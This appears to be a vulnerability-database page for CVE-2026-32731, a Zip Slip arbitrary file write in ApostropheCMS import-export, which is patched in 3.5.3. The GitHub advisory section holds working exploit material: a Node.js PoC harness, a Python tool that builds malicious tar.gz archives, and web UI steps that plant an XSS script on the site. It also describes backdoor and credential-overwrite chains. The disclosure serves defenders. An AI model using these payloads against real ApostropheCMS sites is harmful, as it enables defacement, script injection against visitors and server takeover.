Vulnerability-Lookup

CVE-2026-32731 (GCVE-0-2026-32731)

Vulnerability from cvelistv5 – Published: 2026-03-18 22:03 – Updated: 2026-03-19 16:04

Title

ApostropheCMS has Arbitrary File Write (Zip Slip / Path Traversal) in Import-Export Gzip Extraction

Summary

ApostropheCMS is an open-source content management framework. Prior to version 3.5.3 of `@apostrophecms/import-export`, The `extract()` function in `gzip.js` constructs file-write paths using `fs.createWriteStream(path.join(exportPath, header.name))`. `path.join()` does not resolve or sanitise traversal segments such as `../`. It concatenates them as-is, meaning a tar entry named `../../evil.js` resolves to a path outside the intended extraction directory. No canonical-path check is performed before the write stream is opened. This is a textbook Zip Slip vulnerability. Any user who has been granted the Global Content Modify permission — a role routinely assigned to content editors and site managers — can upload a crafted `.tar.gz` file through the standard CMS import UI and write attacker-controlled content to any path the Node.js process can reach on the host filesystem. Version 3.5.3 of `@apostrophecms/import-export` fixes the issue.

Severity ?

10 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

URL

Tags

https://github.com/apostrophecms/apostrophe/secur…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	apostrophecms	import-export	Affected: < 3.5.3

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-32731",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-19T15:54:58.106435Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-19T16:04:47.962Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "import-export",
          "vendor": "apostrophecms",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.5.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "ApostropheCMS is an open-source content management framework. Prior to version 3.5.3 of `@apostrophecms/import-export`,\nThe `extract()` function in `gzip.js` constructs file-write paths using `fs.createWriteStream(path.join(exportPath, header.name))`. `path.join()` does not resolve or sanitise traversal segments such as `../`. It concatenates them as-is, meaning a tar entry named `../../evil.js` resolves to a path outside the intended extraction directory. No canonical-path check is performed before the write stream is opened. This is a textbook Zip Slip vulnerability. Any user who has been granted the Global Content Modify permission \u2014 a role routinely assigned to content editors and site managers \u2014 can upload a crafted `.tar.gz` file through the standard CMS import UI and write attacker-controlled content to any path the Node.js process can reach on the host filesystem. Version 3.5.3 of `@apostrophecms/import-export` fixes the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 10,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-18T22:03:25.682Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-mwxc-m426-3f78",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-mwxc-m426-3f78"
        }
      ],
      "source": {
        "advisory": "GHSA-mwxc-m426-3f78",
        "discovery": "UNKNOWN"
      },
      "title": "ApostropheCMS has Arbitrary File Write (Zip Slip / Path Traversal) in Import-Export Gzip Extraction"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-32731",
    "datePublished": "2026-03-18T22:03:25.682Z",
    "dateReserved": "2026-03-13T15:02:00.627Z",
    "dateUpdated": "2026-03-19T16:04:47.962Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-32731",
      "date": "2026-04-15",
      "epss": "0.00074",
      "percentile": "0.22467"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-32731\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-18T23:17:29.543\",\"lastModified\":\"2026-03-24T21:31:54.240\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"ApostropheCMS is an open-source content management framework. Prior to version 3.5.3 of `@apostrophecms/import-export`,\\nThe `extract()` function in `gzip.js` constructs file-write paths using `fs.createWriteStream(path.join(exportPath, header.name))`. `path.join()` does not resolve or sanitise traversal segments such as `../`. It concatenates them as-is, meaning a tar entry named `../../evil.js` resolves to a path outside the intended extraction directory. No canonical-path check is performed before the write stream is opened. This is a textbook Zip Slip vulnerability. Any user who has been granted the Global Content Modify permission \u2014 a role routinely assigned to content editors and site managers \u2014 can upload a crafted `.tar.gz` file through the standard CMS import UI and write attacker-controlled content to any path the Node.js process can reach on the host filesystem. Version 3.5.3 of `@apostrophecms/import-export` fixes the issue.\"},{\"lang\":\"es\",\"value\":\"ApostropheCMS es un framework de gesti\u00f3n de contenido de c\u00f3digo abierto. Antes de la versi\u00f3n 3.5.3 de `\u0027@apostrophecms/import-export\u0027`, la funci\u00f3n `\u0027extract\u0027`() en `\u0027gzip.js\u0027` construye rutas de escritura de archivos usando `\u0027fs.createWriteStream(path.join(exportPath, header.name))\u0027`. `\u0027path.join\u0027`() no resuelve ni sanitiza segmentos de recorrido como `\u0027../\u0027`. Los concatena tal cual, lo que significa que una entrada tar llamada `\u0027../../evil.js\u0027` se resuelve a una ruta fuera del directorio de extracci\u00f3n previsto. No se realiza ninguna comprobaci\u00f3n de ruta can\u00f3nica antes de que se abra el flujo de escritura. Esta es una vulnerabilidad Zip Slip de libro de texto. Cualquier usuario al que se le haya concedido el permiso de Modificar Contenido Global \u2014 un rol asignado rutinariamente a editores de contenido y administradores de sitios \u2014 puede cargar un archivo \u0027.tar.gz\u0027 manipulado a trav\u00e9s de la interfaz de usuario de importaci\u00f3n est\u00e1ndar del CMS y escribir contenido controlado por el atacante en cualquier ruta que el proceso de Node.js pueda alcanzar en el sistema de archivos del host. La versi\u00f3n 3.5.3 de `\u0027@apostrophecms/import-export\u0027` soluciona el problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":9.9,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.1,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:apostrophecms:import-export:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"3.5.3\",\"matchCriteriaId\":\"DC368091-4E2B-454F-BFA1-96EADD6524A9\"}]}]}],\"references\":[{\"url\":\"https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-mwxc-m426-3f78\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-32731\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-19T15:54:58.106435Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-19T16:03:40.666Z\"}}], \"cna\": {\"title\": \"ApostropheCMS has Arbitrary File Write (Zip Slip / Path Traversal) in Import-Export Gzip Extraction\", \"source\": {\"advisory\": \"GHSA-mwxc-m426-3f78\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 10, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"apostrophecms\", \"product\": \"import-export\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.5.3\"}]}], \"references\": [{\"url\": \"https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-mwxc-m426-3f78\", \"name\": \"https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-mwxc-m426-3f78\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"ApostropheCMS is an open-source content management framework. Prior to version 3.5.3 of `@apostrophecms/import-export`,\\nThe `extract()` function in `gzip.js` constructs file-write paths using `fs.createWriteStream(path.join(exportPath, header.name))`. `path.join()` does not resolve or sanitise traversal segments such as `../`. It concatenates them as-is, meaning a tar entry named `../../evil.js` resolves to a path outside the intended extraction directory. No canonical-path check is performed before the write stream is opened. This is a textbook Zip Slip vulnerability. Any user who has been granted the Global Content Modify permission \\u2014 a role routinely assigned to content editors and site managers \\u2014 can upload a crafted `.tar.gz` file through the standard CMS import UI and write attacker-controlled content to any path the Node.js process can reach on the host filesystem. Version 3.5.3 of `@apostrophecms/import-export` fixes the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-18T22:03:25.682Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-32731\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-19T16:04:47.962Z\", \"dateReserved\": \"2026-03-13T15:02:00.627Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-18T22:03:25.682Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-MWXC-M426-3F78

Vulnerability from github – Published: 2026-03-18 19:49 – Updated: 2026-03-18 19:49

Summary

ApostropheCMS has Arbitrary File Write (Zip Slip / Path Traversal) in Import-Export Gzip Extraction

Details

Reported: 2026-03-08
Status: patched and released in version 3.5.3 of @apostrophecms/import-export

Product

Field	Value
Repository	`apostrophecms/apostrophe` (monorepo)
Affected Package	`@apostrophecms/import-export`
Affected File	`packages/import-export/lib/formats/gzip.js`
Affected Function	`extract(filepath, exportPath)` — lines ~132–157
Minimum Required Permission	Global Content Modify (any editor-level user with import access)

Vulnerability Summary

The extract() function in gzip.js constructs file-write paths using:

fs.createWriteStream(path.join(exportPath, header.name))

path.join() does not resolve or sanitise traversal segments such as ../. It concatenates them as-is, meaning a tar entry named ../../evil.js resolves to a path outside the intended extraction directory. No canonical-path check is performed before the write stream is opened.

This is a textbook Zip Slip vulnerability. Any user who has been granted the Global Content Modify permission — a role routinely assigned to content editors and site managers — can upload a crafted .tar.gz file through the standard CMS import UI and write attacker-controlled content to any path the Node.js process can reach on the host filesystem.

Security Impact

This vulnerability provides unauthenticated-equivalent arbitrary file write to any user with content editor permissions. The full impact chain is:

1. Arbitrary File Write

Write any file to any path the Node.js process user can access. Confirmed writable targets in testing:

Any path the CMS process has permission to

2. Static Web Directory — Defacement & Malicious Asset Injection

ApostropheCMS serves <project-root>/public/ via Express static middleware:

// packages/apostrophe/modules/@apostrophecms/asset/index.js
express.static(self.apos.rootDir + '/public', self.options.static || {})

A traversal payload targeting public/ makes any uploaded file directly HTTP-accessible:

This enables: - Full site defacement - Serving phishing pages from the legitimate CMS domain - Injecting malicious JavaScript served to all site visitors (stored XSS at scale)

3. Persistent Backdoor / RCE (Post-Restart)

If the traversal targets any .js file loaded by Node.js on startup (e.g., a module index.js, a config file, a routes file), the payload becomes a persistent backdoor that executes with the CMS process privileges on the next server restart. In container/cloud environments, restarts happen automatically on deploy, crash, or health-check failure — meaning the attacker does not need to manually trigger one.

4. Credential and Secret File Overwrite

Overwrite .env, app.config.js, database seed files, or any config file to: - Exfiltrate database credentials on next load - Redirect authentication to an attacker-controlled backend - Disable security controls (rate limiting, MFA, CSRF)

5. Denial of Service

Overwrite any critical application file (package.json, node_modules entries, etc.) with garbage data, rendering the application unbootable.

Required Permission

Global Content Modify — this is a standard editor-level permission routinely granted to content managers, blog editors, and site administrators in typical ApostropheCMS deployments. It is not an administrator-only capability. Any organisation that delegates content editing to non-technical staff is exposed.

Proof of Concept

Two PoC artifacts are provided:

File	Purpose
`tmp-import-export-zip-slip-poc.js`	Automated Node.js harness — verifies the write happens without a browser
`make-slip-tar.py`	Attacker tool — generates a real `.tar.gz` for upload via the CMS web UI

PoC 1 — Automated Verification (`tmp-import-export-zip-slip-poc.js`)

const fs = require('node:fs');
const fsp = require('node:fs/promises');
const path = require('node:path');
const os = require('node:os');
const zlib = require('node:zlib');
const tar = require('tar-stream');

const gzipFormat = require('./packages/import-export/lib/formats/gzip.js');

async function makeArchive(archivePath) {
  const pack = tar.pack();
  const gzip = zlib.createGzip();
  const out = fs.createWriteStream(archivePath);

  const done = new Promise((resolve, reject) => {
    out.on('finish', resolve);
    out.on('error', reject);
    gzip.on('error', reject);
    pack.on('error', reject);
  });

  pack.pipe(gzip).pipe(out);

  pack.entry({ name: 'aposDocs.json' }, '[]');
  pack.entry({ name: 'aposAttachments.json' }, '[]');

  // Traversal payload
  pack.entry({ name: '../../zip-slip-pwned.txt' }, 'PWNED_FROM_TAR');

  pack.finalize();
  await done;
}

(async () => {
  const base = await fsp.mkdtemp(path.join(os.tmpdir(), 'apos-zip-slip-'));
  const archivePath = path.join(base, 'evil-export.gz');
  const exportPath = archivePath.replace(/\.gz$/, '');

  await makeArchive(archivePath);

  const expectedOutsideWrite = path.resolve(exportPath, '../../zip-slip-pwned.txt');

  // Ensure clean pre-state
  try { await fsp.unlink(expectedOutsideWrite); } catch (_) {}

  await gzipFormat.input(archivePath);

  const exists = fs.existsSync(expectedOutsideWrite);
  const content = exists ? await fsp.readFile(expectedOutsideWrite, 'utf8') : '';

  console.log('EXPORT_PATH:', exportPath);
  console.log('EXPECTED_OUTSIDE_WRITE:', expectedOutsideWrite);
  console.log('ZIP_SLIP_WRITE_HAPPENED:', exists);
  console.log('WRITTEN_CONTENT:', content.trim());
})();

Run:

node .\tmp-import-export-zip-slip-poc.js

Observed output (confirmed):

EXPORT_PATH:            C:\Users\...\AppData\Local\Temp\apos-zip-slip-XXXXXX\evil-export
EXPECTED_OUTSIDE_WRITE: C:\Users\...\AppData\Local\Temp\zip-slip-pwned.txt
ZIP_SLIP_WRITE_HAPPENED: true
WRITTEN_CONTENT:        PWNED_FROM_TAR

The file zip-slip-pwned.txt is written two directories above the extraction root, confirming path traversal.

PoC 2 — Web UI Exploitation (`make-slip-tar.py`)

Script (make-slip-tar.py):

import tarfile, io, sys

if len(sys.argv) != 3:
    print("Usage: python make-slip-tar.py <payload_file> <target_path>")
    sys.exit(1)

payload_file = sys.argv[1]
target_path  = sys.argv[2]
out = "evil-slip.tar.gz"

with open(payload_file, "rb") as f:
    payload = f.read()

with tarfile.open(out, "w:gz") as t:
    docs = io.BytesIO(b"[]")
    info = tarfile.TarInfo("aposDocs.json")
    info.size = len(docs.getvalue())
    t.addfile(info, docs)

    atts = io.BytesIO(b"[]")
    info = tarfile.TarInfo("aposAttachments.json")
    info.size = len(atts.getvalue())
    t.addfile(info, atts)

    info = tarfile.TarInfo(target_path)
    info.size = len(payload)
    t.addfile(info, io.BytesIO(payload))

print("created", out)

Steps to Reproduce (Web UI — Real Exploitation)

Step 1 — Create the payload file

Create a file with the content you want to write to the server. For a static web directory write:

echo "<!-- injected by attacker --><script>alert('XSS')</script>" > payload.html

Step 2 — Generate the malicious archive

Use the traversal path that reaches the CMS public/ directory. The number of ../ segments depends on where the CMS stores its temporary extraction directory relative to the project root — typically 2–4 levels up. Adjust as needed:

python make-slip-tar.py payload.html "../../../../<project-root>/public/injected.html"

This creates evil-slip.tar.gz containing: - aposDocs.json — empty, required by the importer - aposAttachments.json — empty, required by the importer - ../../../../<project-root>/public/injected.html — the traversal payload

Step 3 — Upload via CMS Import UI

Log in to the CMS with any account that has Global Content Modify permission.
Navigate to Open Global Settings → More Options → Import.
Select evil-slip.tar.gz and click Import.
The CMS accepts the file and begins extraction — no error is shown.

Step 4 — Confirm the write

curl http://localhost:3000/injected.html

Expected response:

<!-- injected by attacker --><script>alert('XSS')</script>

The file is now being served from the CMS's own domain to all visitors.

Video POC : https://drive.google.com/file/d/1bbuQnoJv_xjM_uvfjnstmTh07FB7VqGH/view?usp=sharing

Severity ?

9.9 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.5.2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@apostrophecms/import-export"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32731"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T19:49:07Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "**Reported:** 2026-03-08  \n**Status:** patched and released in version 3.5.3 of `@apostrophecms/import-export`\n\n---\n\n## Product\n\n| Field | Value |\n|---|---|\n| Repository | `apostrophecms/apostrophe` (monorepo) |\n| Affected Package | `@apostrophecms/import-export` |\n| Affected File | `packages/import-export/lib/formats/gzip.js` |\n| Affected Function | `extract(filepath, exportPath)` \u2014 lines ~132\u2013157 |\n| Minimum Required Permission | **Global Content Modify** (any editor-level user with import access) |\n\n---\n\n## Vulnerability Summary\n\nThe `extract()` function in `gzip.js` constructs file-write paths using:\n\n```js\nfs.createWriteStream(path.join(exportPath, header.name))\n```\n\n`path.join()` does **not** resolve or sanitise traversal segments such as `../`. It concatenates them as-is, meaning a tar entry named `../../evil.js` resolves to a path **outside** the intended extraction directory. No canonical-path check is performed before the write stream is opened.\n\nThis is a textbook **Zip Slip** vulnerability. Any user who has been granted the **Global Content Modify** permission \u2014 a role routinely assigned to content editors and site managers \u2014 can upload a crafted `.tar.gz` file through the standard CMS import UI and write attacker-controlled content to **any path the Node.js process can reach on the host filesystem**.\n\n---\n\n## Security Impact\n\nThis vulnerability provides **unauthenticated-equivalent arbitrary file write** to any user with content editor permissions. The full impact chain is:\n\n### 1. Arbitrary File Write\nWrite any file to any path the Node.js process user can access. Confirmed writable targets in testing:\n\n- Any path the CMS process has permission to\n\n### 2. Static Web Directory \u2014 Defacement \u0026 Malicious Asset Injection\nApostropheCMS serves `\u003cproject-root\u003e/public/` via Express static middleware:\n\n```js\n// packages/apostrophe/modules/@apostrophecms/asset/index.js\nexpress.static(self.apos.rootDir + \u0027/public\u0027, self.options.static || {})\n```\n\nA traversal payload targeting `public/` makes any uploaded file **directly HTTP-accessible**:\n\nThis enables:\n- Full site defacement\n- Serving phishing pages from the legitimate CMS domain\n- Injecting malicious JavaScript served to all site visitors (stored XSS at scale)\n\n### 3. Persistent Backdoor / RCE (Post-Restart)\nIf the traversal targets any `.js` file loaded by Node.js on startup (e.g., a module `index.js`, a config file, a routes file), the payload becomes a **persistent backdoor** that executes with the CMS process privileges on the next server restart. In container/cloud environments, restarts happen automatically on deploy, crash, or health-check failure \u2014 meaning the attacker does not need to manually trigger one.\n\n### 4. Credential and Secret File Overwrite\nOverwrite `.env`, `app.config.js`, database seed files, or any config file to:\n- Exfiltrate database credentials on next load\n- Redirect authentication to an attacker-controlled backend\n- Disable security controls (rate limiting, MFA, CSRF)\n\n### 5. Denial of Service\nOverwrite any critical application file (`package.json`, `node_modules` entries, etc.) with garbage data, rendering the application unbootable.\n\n---\n\n## Required Permission\n\n**Global Content Modify** \u2014 this is a standard editor-level permission routinely granted to content managers, blog editors, and site administrators in typical ApostropheCMS deployments. It is **not** an administrator-only capability. Any organisation that delegates content editing to non-technical staff is exposed.\n\n---\n\n## Proof of Concept\n\nTwo PoC artifacts are provided:\n\n| File | Purpose |\n|---|---|\n| `tmp-import-export-zip-slip-poc.js` | Automated Node.js harness \u2014 verifies the write happens without a browser |\n| `make-slip-tar.py` | Attacker tool \u2014 generates a real `.tar.gz` for upload via the CMS web UI |\n\n---\n\n### PoC 1 \u2014 Automated Verification (`tmp-import-export-zip-slip-poc.js`)\n\n```js\nconst fs = require(\u0027node:fs\u0027);\nconst fsp = require(\u0027node:fs/promises\u0027);\nconst path = require(\u0027node:path\u0027);\nconst os = require(\u0027node:os\u0027);\nconst zlib = require(\u0027node:zlib\u0027);\nconst tar = require(\u0027tar-stream\u0027);\n\nconst gzipFormat = require(\u0027./packages/import-export/lib/formats/gzip.js\u0027);\n\nasync function makeArchive(archivePath) {\n  const pack = tar.pack();\n  const gzip = zlib.createGzip();\n  const out = fs.createWriteStream(archivePath);\n\n  const done = new Promise((resolve, reject) =\u003e {\n    out.on(\u0027finish\u0027, resolve);\n    out.on(\u0027error\u0027, reject);\n    gzip.on(\u0027error\u0027, reject);\n    pack.on(\u0027error\u0027, reject);\n  });\n\n  pack.pipe(gzip).pipe(out);\n\n  pack.entry({ name: \u0027aposDocs.json\u0027 }, \u0027[]\u0027);\n  pack.entry({ name: \u0027aposAttachments.json\u0027 }, \u0027[]\u0027);\n\n  // Traversal payload\n  pack.entry({ name: \u0027../../zip-slip-pwned.txt\u0027 }, \u0027PWNED_FROM_TAR\u0027);\n\n  pack.finalize();\n  await done;\n}\n\n(async () =\u003e {\n  const base = await fsp.mkdtemp(path.join(os.tmpdir(), \u0027apos-zip-slip-\u0027));\n  const archivePath = path.join(base, \u0027evil-export.gz\u0027);\n  const exportPath = archivePath.replace(/\\.gz$/, \u0027\u0027);\n\n  await makeArchive(archivePath);\n\n  const expectedOutsideWrite = path.resolve(exportPath, \u0027../../zip-slip-pwned.txt\u0027);\n\n  // Ensure clean pre-state\n  try { await fsp.unlink(expectedOutsideWrite); } catch (_) {}\n\n  await gzipFormat.input(archivePath);\n\n  const exists = fs.existsSync(expectedOutsideWrite);\n  const content = exists ? await fsp.readFile(expectedOutsideWrite, \u0027utf8\u0027) : \u0027\u0027;\n\n  console.log(\u0027EXPORT_PATH:\u0027, exportPath);\n  console.log(\u0027EXPECTED_OUTSIDE_WRITE:\u0027, expectedOutsideWrite);\n  console.log(\u0027ZIP_SLIP_WRITE_HAPPENED:\u0027, exists);\n  console.log(\u0027WRITTEN_CONTENT:\u0027, content.trim());\n})();\n```\n**Run:**\n```powershell\nnode .\\tmp-import-export-zip-slip-poc.js\n```\n\n**Observed output (confirmed):**\n```\nEXPORT_PATH:            C:\\Users\\...\\AppData\\Local\\Temp\\apos-zip-slip-XXXXXX\\evil-export\nEXPECTED_OUTSIDE_WRITE: C:\\Users\\...\\AppData\\Local\\Temp\\zip-slip-pwned.txt\nZIP_SLIP_WRITE_HAPPENED: true\nWRITTEN_CONTENT:        PWNED_FROM_TAR\n```\n\nThe file `zip-slip-pwned.txt` is written **two directories above** the extraction root, confirming path traversal.\n\n---\n\n### PoC 2 \u2014 Web UI Exploitation (`make-slip-tar.py`)\n\n**Script (`make-slip-tar.py`):**\n```python\nimport tarfile, io, sys\n\nif len(sys.argv) != 3:\n    print(\"Usage: python make-slip-tar.py \u003cpayload_file\u003e \u003ctarget_path\u003e\")\n    sys.exit(1)\n\npayload_file = sys.argv[1]\ntarget_path  = sys.argv[2]\nout = \"evil-slip.tar.gz\"\n\nwith open(payload_file, \"rb\") as f:\n    payload = f.read()\n\nwith tarfile.open(out, \"w:gz\") as t:\n    docs = io.BytesIO(b\"[]\")\n    info = tarfile.TarInfo(\"aposDocs.json\")\n    info.size = len(docs.getvalue())\n    t.addfile(info, docs)\n\n    atts = io.BytesIO(b\"[]\")\n    info = tarfile.TarInfo(\"aposAttachments.json\")\n    info.size = len(atts.getvalue())\n    t.addfile(info, atts)\n\n    info = tarfile.TarInfo(target_path)\n    info.size = len(payload)\n    t.addfile(info, io.BytesIO(payload))\n\nprint(\"created\", out)\n```\n\n---\n\n## Steps to Reproduce (Web UI \u2014 Real Exploitation)\n\n### Step 1 \u2014 Create the payload file\n\nCreate a file with the content you want to write to the server. For a static web directory write:\n\n```bash\necho \"\u003c!-- injected by attacker --\u003e\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\" \u003e payload.html\n```\n\n### Step 2 \u2014 Generate the malicious archive\n\nUse the traversal path that reaches the CMS `public/` directory. The number of `../` segments depends on where the CMS stores its temporary extraction directory relative to the project root \u2014 typically 2\u20134 levels up. Adjust as needed:\n\n```bash\npython make-slip-tar.py payload.html \"../../../../\u003cproject-root\u003e/public/injected.html\"\n```\n\nThis creates `evil-slip.tar.gz` containing:\n- `aposDocs.json` \u2014 empty, required by the importer\n- `aposAttachments.json` \u2014 empty, required by the importer\n- `../../../../\u003cproject-root\u003e/public/injected.html` \u2014 the traversal payload\n\n### Step 3 \u2014 Upload via CMS Import UI\n\n1. Log in to the CMS with any account that has **Global Content Modify** permission.\n2. Navigate to **Open Global Settings \u2192 More Options \u2192 Import**.\n3. Select `evil-slip.tar.gz` and click **Import**.\n4. The CMS accepts the file and begins extraction \u2014 no error is shown.\n\n### Step 4 \u2014 Confirm the write\n\n```bash\ncurl http://localhost:3000/injected.html\n```\n\nExpected response:\n```\n\u003c!-- injected by attacker --\u003e\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\n```\n\nThe file is now being served from the CMS\u0027s own domain to all visitors.\n\n### Video POC : https://drive.google.com/file/d/1bbuQnoJv_xjM_uvfjnstmTh07FB7VqGH/view?usp=sharing\n---",
  "id": "GHSA-mwxc-m426-3f78",
  "modified": "2026-03-18T19:49:07Z",
  "published": "2026-03-18T19:49:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-mwxc-m426-3f78"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apostrophecms/apostrophe"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ApostropheCMS has Arbitrary File Write (Zip Slip / Path Traversal) in Import-Export Gzip Extraction"
}

FKIE_CVE-2026-32731

Vulnerability from fkie_nvd - Published: 2026-03-18 23:17 - Updated: 2026-03-24 21:31

Severity ?

9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-mwxc-m426-3f78	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	apostrophecms	import-export	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:apostrophecms:import-export:*:*:*:*:*:node.js:*:*",
              "matchCriteriaId": "DC368091-4E2B-454F-BFA1-96EADD6524A9",
              "versionEndExcluding": "3.5.3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
